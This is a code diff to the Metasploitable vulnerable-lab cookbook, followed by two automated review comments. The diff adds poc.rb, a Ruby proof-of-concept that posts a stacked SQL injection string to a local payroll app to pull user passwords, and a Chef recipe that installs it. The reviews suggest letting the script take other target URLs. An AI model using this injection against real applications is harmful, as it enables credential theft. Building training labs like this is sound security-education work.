diff --git a/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php b/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
index ee8a8f7..7e05f68 100644
--- a/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
+++ b/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
@@ -38,6 +38,7 @@ if($_POST['s']){
 foreach ($keys as $key) {
 echo "" . $row[$key] . "";
 }
+ echo "\n";
 }
 $result->free();
 }
diff --git a/chef/cookbooks/metasploitable/files/payroll_app/poc.rb b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
new file mode 100644
index 0000000..48452b6
--- /dev/null
+++ b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
@@ -0,0 +1,14 @@
+require 'net/http'
+
+url = "http://127.0.0.1/payroll_app.php"
+uri = URI(url)
+user = 'luke_skywalker'
+injection = "password'; select password from users where username='' OR ''='"
+
+puts "Making POST request to #{uri} with the following parameters:"
+puts "'user' = #{user}"
+puts "'password' = #{injection}"
+res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
+
+puts "Response body is #{res.body}"
+puts "Done"
diff --git a/chef/cookbooks/metasploitable/recipes/payroll_app.rb b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
index 9e8f97a..94d8d2d 100644
--- a/chef/cookbooks/metasploitable/recipes/payroll_app.rb
+++ b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
@@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
 mode '0755'
 end
 
+directory '/home/vagrant/poc/payroll_app/' do
+ mode '0755'
+ owner 'vagrant'
+ recursive true
+end
+
+cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
+ source 'payroll_app/poc.rb'
+ mode '0755'
+end
+
 bash 'create payroll database and import data' do
 code <<-EOH
 mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
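Review bot: The `res = Net::HTTP.post_form(...)` line in poc.rb never inspects the status, so a 404 or 500 from the target (for instance when the app is not deployed yet or Apache is down) is printed by the unconditional `puts "Response body is #{res.body}"` as if the injection had succeeded; add `abort "Unexpected HTTP #{res.code}" unless res.is_a?(Net::HTTPSuccess)` before the body is printed. The target is hard-coded to `127.0.0.1`, which only works from inside the VM; `uri = URI(ARGV.fetch(0, "http://127.0.0.1/payroll_app.php"))` keeps that default while letting the PoC be pointed at the box from the host (and makes the separate `url` variable unnecessary). A short header comment stating that the script demonstrates the payroll app's SQL injection by closing the password literal and appending a second `select` after `;`, and that it is meant only for this deliberately vulnerable lab app, would spare the next reader from reverse-engineering the `injection` string; whether the stacked-query form actually executes presumably depends on how payroll_app.php runs the query, which this diff does not show.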
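Review bot: The new `cookbook_file '/home/vagrant/poc/payroll_app/poc.rb'` resource sets `mode '0755'` but no `owner`/`group`, so under a root-run chef-client the file lands root-owned inside a directory the `directory` resource hands to `vagrant`; add `owner 'vagrant'` and `group 'vagrant'` to the file resource (and `group 'vagrant'` to the directory) so the lab user can actually edit or replace it. Since poc.rb as added in this commit begins with `require 'net/http'` and carries no shebang, the executable bit gains nothing and `mode '0644'` states the real permission; it is run as `ruby poc.rb` either way. Also note that with `recursive true` Chef applies `owner`/`mode` only to the leaf `payroll_app/` directory, so the intermediate `/home/vagrant/poc` is presumably created root-owned — declare it explicitly if that matters. The `bash 'create payroll database and import data'` resource that follows the added lines continues past the end of the hunk.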